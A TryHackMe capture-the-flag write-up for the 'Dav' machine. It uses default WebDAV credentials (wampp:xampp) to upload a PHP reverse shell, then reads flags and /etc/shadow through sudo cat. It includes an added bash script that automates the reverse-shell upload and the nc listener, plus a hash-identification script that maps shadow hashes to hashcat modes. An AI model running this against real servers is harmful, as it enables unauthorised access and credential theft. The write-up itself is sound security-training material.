Dav (THM)
TryHackMe – Dav Write-Up
topics: Web application security
Enumeration
Local Privilege Escalation (Exploitation)
Root Privilege Escalation
new tools: cadaver
tools: nmapAutomator, dirsearch, curl, Kali webshells
Enumeration
Initial nmap scan:
./nmapAutomator.sh $ip Basic
The only port that appears to be open is 80 (HTTP). Let's run a vulnerability scan and dirsearch:
./nmapAutomator.sh $ip Vulns
python3 dirsearch.py -u $ip -e php,html,txt
There appears to be only one subdirectory, /webdav. Attempting to navigate to this page, as well as running dirsearch or gobuster against /webdav, results in a 401 Unauthorized response.
Searching searchsploit for the server version yields only niche exploits that would not be practical for this CTF challenge.
I attempted this exploit but did not realize it only worked when the server returned a 201 status code.
This led me to Google "webdav exploit", which proved useful as it revealed the default XAMPP WebDAV credentials wampp:xampp.
Local Privilege Escalation
The passwd.dav file contains a hash that I was unable to crack. However, after more googling I discovered an interesting tool, cadaver (a CLI WebDAV client).
I then learned from this Null Byte article how to achieve a shell on a WebDAV server.
Exploit steps:
1. We will need a PHP shell. Copy a default one from Kali into the working directory (here /root):
cp /usr/share/webshells/php/php-reverse-shell.php .
2. Edit the $ip and $port values in the file to the attacker IP and the desired listening port.
3. Upload the reverse shell to the WebDAV server with curl. (Initially I tried to use get from the cadaver CLI, but since the file is already on the Kali machine, put is the command that uploads from within cadaver; curl does the same with --upload-file.)
curl http://10.10.66.11/webdav/shell.php -u wampp:xampp --upload-file php-reverse-shell.php
4. Listen with nc on the chosen port, then navigate to /webdav/shell.php (the request needs the same credentials) to execute the file and trigger the shell.
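The steps above as one script, an added example rather than code from the write-up or the Null Byte article: it patches the listener address in the Kali reverse shell, uploads it with curl, and checks the HTTP status before triggering (a 201 Created is what a successful upload returns, as noted earlier; 204 No Content means an existing file was overwritten; 405 means PUT is not enabled on that path). The script path, the wampp:xampp credentials on /webdav, and the `$ip`/`$port` lines in pentestmonkey's php-reverse-shell.php are assumptions about the target and the Kali file layout.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): prepare a PHP reverse shell,
# upload it over WebDAV with curl, and check the response code before triggering.
# Assumes the Kali webshell /usr/share/webshells/php/php-reverse-shell.php, which
# contains the lines `$ip = '127.0.0.1';` and `$port = 1234;` that must be edited.
set -u

# Patch the listener address and port in a pentestmonkey-style reverse shell.
# usage: prepare_shell SRC DST LHOST LPORT
prepare_shell() {
    local src="$1" dst="$2" lhost="$3" lport="$4"
    sed -e "s/^\\\$ip = '[^']*';/\$ip = '${lhost}';/" \
        -e "s/^\\\$port = [0-9]*;/\$port = ${lport};/" "$src" > "$dst"
}

# Upload a file with HTTP PUT (curl --upload-file) and print only the status code.
# usage: webdav_put URL USER PASS FILE
webdav_put() {
    local url="$1" user="$2" pass="$3" file="$4"
    curl -s -o /dev/null -w '%{http_code}' -u "${user}:${pass}" \
        --upload-file "$file" "$url"
}

# Interpret the PUT response: 201 means the resource was created, 204 means an
# existing resource was overwritten; anything else means the upload failed.
# usage: put_result CODE  -> prints a verdict; exit 0 on success, 1 on failure
put_result() {
    case "$1" in
        201)     echo "created"; return 0 ;;
        204)     echo "overwritten"; return 0 ;;
        401|403) echo "auth failed (check credentials)"; return 1 ;;
        405)     echo "PUT not allowed (check the OPTIONS Allow header)"; return 1 ;;
        *)       echo "unexpected status $1"; return 1 ;;
    esac
}

# Full run against a live target; only executed when arguments are given.
# usage: ./webdav_shell.sh TARGET LHOST LPORT
if [ "${1:-}" ]; then
    target="$1"; lhost="$2"; lport="$3"
    prepare_shell /usr/share/webshells/php/php-reverse-shell.php shell.php "$lhost" "$lport"
    code=$(webdav_put "http://${target}/webdav/shell.php" wampp xampp shell.php)
    put_result "$code" || exit 1
    # start the listener, then request the uploaded page to fire the shell
    nc -lvnp "$lport" &
    sleep 1
    curl -s -u wampp:xampp "http://${target}/webdav/shell.php" >/dev/null
    wait
fi
```

Checking the status code is the step that was missing when the earlier exploit attempt silently failed: a 401 or 405 on PUT tells you immediately whether the problem is credentials or a method that the WebDAV location does not allow, instead of discovering it when the shell never connects back.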
Root Privilege Escalation
First things first on Linux: sudo -l
So our user can run cat with sudo. We can simply view the flags with
sudo cat /home/merlin/user.txt
sudo cat /root/root.txt
Getting a reverse shell with a terminal as user or root would be trickier. With sudo cat we can read the password file /etc/shadow and the sudoers file /etc/sudoers, but without a terminal we cannot change users with su even if we crack a password. There is no other place to log in as the user merlin, or even to send a shell back to us, as far as I can see at the moment. (One general check worth making in this situation: if python is present on the target, spawning a pty with python -c 'import pty; pty.spawn("/bin/bash")' upgrades the reverse shell to an interactive one in which su can prompt for a password.) Maybe there is a kernel exploit we can use; I can always transfer LinPEAS to enumerate. This will be a good post-exploitation exercise to return to.
This machine has the same kernel as Fowsniff, which used a kernel exploit to spawn a root shell, so we can attempt to use that same exploit.
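Two of the dead ends above come down to recognising a hash format: the uncrackable hash in passwd.dav (an Apache htpasswd file) and the crypt(3) hashes that sudo cat /etc/shadow now exposes. The following is an added example, not part of the write-up, that classifies the hash prefixes you meet in both files and maps them to the hashcat modes to feed them to. The sample lines in the test are constructed, not copied from the machine; the hashcat mode numbers are the standard ones (1600 for $apr1$, 500 for $1$, 1800 for $6$, 7400 for $5$, 3200 for bcrypt, 101 for {SHA}).

```shell
#!/usr/bin/env bash
# Added example (not part of the original write-up): classify the hash formats
# found in an Apache htpasswd file such as passwd.dav and in /etc/shadow, and map
# each to the hashcat mode that cracks it. Sample inputs are constructed.

# usage: identify_hash HASH  -> prints "<scheme> (hashcat -m N)" or a reason
identify_hash() {
    case "$1" in
        '$apr1$'*)               echo "Apache APR1 md5crypt (hashcat -m 1600)" ;;
        '$1$'*)                  echo "md5crypt (hashcat -m 500)" ;;
        '$2a$'*|'$2b$'*|'$2y$'*) echo "bcrypt (hashcat -m 3200)" ;;
        '$5$'*)                  echo "sha256crypt (hashcat -m 7400)" ;;
        '$6$'*)                  echo "sha512crypt (hashcat -m 1800)" ;;
        '$y$'*)                  echo "yescrypt (no hashcat mode; use john)" ;;
        '{SHA}'*)                echo "htpasswd SHA1 base64 (hashcat -m 101)" ;;
        '*'|'!'*|'')             echo "locked or no password" ;;
        *)                       echo "unknown" ;;
    esac
}

# Walk a colon-separated credentials file (htpasswd or /etc/shadow): user:hash[:...]
# and print one "user<TAB>verdict" line per entry, skipping blank lines.
# usage: classify_file FILE
classify_file() {
    while IFS=: read -r user hash _; do
        [ -z "$user" ] && continue
        printf '%s\t%s\n' "$user" "$(identify_hash "$hash")"
    done < "$1"
}
```

Running classify_file over a copy of /etc/shadow pulled out with sudo cat separates the accounts that are actually crackable from locked ones (an asterisk or leading exclamation mark) before any wordlist time is spent; the same function on passwd.dav names the mode the htpasswd hash needs.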